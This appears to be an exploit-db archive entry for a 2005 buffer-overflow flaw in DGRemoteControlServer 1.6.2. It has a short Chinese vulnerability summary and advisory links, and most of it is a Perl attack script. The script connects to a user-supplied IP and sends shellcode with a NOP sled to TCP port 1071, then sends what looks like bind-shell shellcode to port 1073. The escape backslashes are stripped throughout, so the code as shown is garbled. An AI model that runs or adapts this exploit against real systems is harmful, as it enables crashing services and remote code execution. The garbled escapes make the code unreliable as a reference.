https://www.exploit-db.com/exploits/1107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-229

DGRemoteControlServer是一个远程控制服务器软件。DGRemoteControlServer1.6.2存在拒绝服务漏洞。远程攻击者可以通过向TCP端口1071或1073的发送长消息，导致系统拒绝服务(崩溃或CPU消耗)，并可能执行任意代码。造成该漏洞的原因有可能是因为缓冲区溢出。

#!/usr/local/bin/perl
#
#  Remote Control Server DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
# 
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#

$ARGC=@ARGV;
if ($ARGC !=1) {
    print "n";
    print " Remote Control Server DOS Exploitn";
    print "------------------------------------nn";
    print "Usage: $0 [remote IP]n";
    print "Exam: $0 127.0.0.1n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1071"; 
print "n";
print "[+] Connect to $remote..n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";


socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

print "[+] Connectedn";
print "[+] Build server sploit..n";
sleep(3);
$sploit = "xebx03x5axebx05xe8xf8xffxffxffx8bxecx8bxc2x83xc0x18x33xc9";
$sploit=$sploit . "x66xb9xb3x80x66x81xf1x80x80x80x30x99x40xe2xfaxaax59";
$sploit=$sploit . "xf1x19x99x99x99xf3x9bxc9xc9xf1x99x99x99x89x1ax5bxa4";
$sploit=$sploit . "xcbx27x51x99xd5x99x66x8fxaax59xc9x27x09x98xd5x99x66";
$sploit=$sploit . "x8fxfaxa3xc5xfdxfcxffxfaxf6xf4xb7xf0xe0xfdx99";

print "[+] Attacking server..n";
sleep(2);
$msg = "reboot" . $sploit . "x90" x (3096 - length($sploit)) . "xe8xf1xc5x05" . "|LOGOFF|";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
print "DONEn";
print "[+] Server D0s'edn";
sleep(1);
close(SOCK);

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port1 = "1073"; 

print "[+] Connect to Client server..n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port1, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK1, $paddr) or die "Error: $!";

print "[+] Connectedn";
print "[+] Build client Spl0it..n";
sleep(3);

$dos =
"xebx6ex5ex29xc0x89x46x10".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x40x89xc3x89x46x0cx40x89".
"x46x08x8dx4ex08xb0x66xcd".
"x80x43xc6x46x10x10x88x46".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x08x31xc0x31xd2x89x46x18".
"xb0x90x66x89x46x16x8dx4e".
"x14x89x4ex0cx8dx4ex08xb0".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x14x89x4ex0cx8dx4ex08xb0".
"x66xcdx80x89x5ex0cx43x43".
"xb0x66xcdx80x89x56x0cx89".
"x56x10xb0x66x43xcdx80x86".
"xc3xb0x3fx29xc9xcdx80xb0".
"x3fx41xcdx80xb0x3fx41xcd".
"x80x88x56x07x89x76x0cx87".
"xf3x8dx4bx0cxb0x0bxcdx80".
"xe8x8dxffxff";


print "[+] Attacking client..n";
sleep(2);

print $dos;
send(SOCK1, $dos, 0) or die "Cannot send query: $!";

print "DONEn";
print "[+] Client D0s'edn";
sleep(1);
close(SOCK1);
exit;

# milw0rm.com [2005-07-15]

来源:BID
名称:14263
链接:http://www.securityfocus.com/bid/14263
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=72
来源:SECUNIA
名称:16070
链接:http://secunia.com/advisories/16070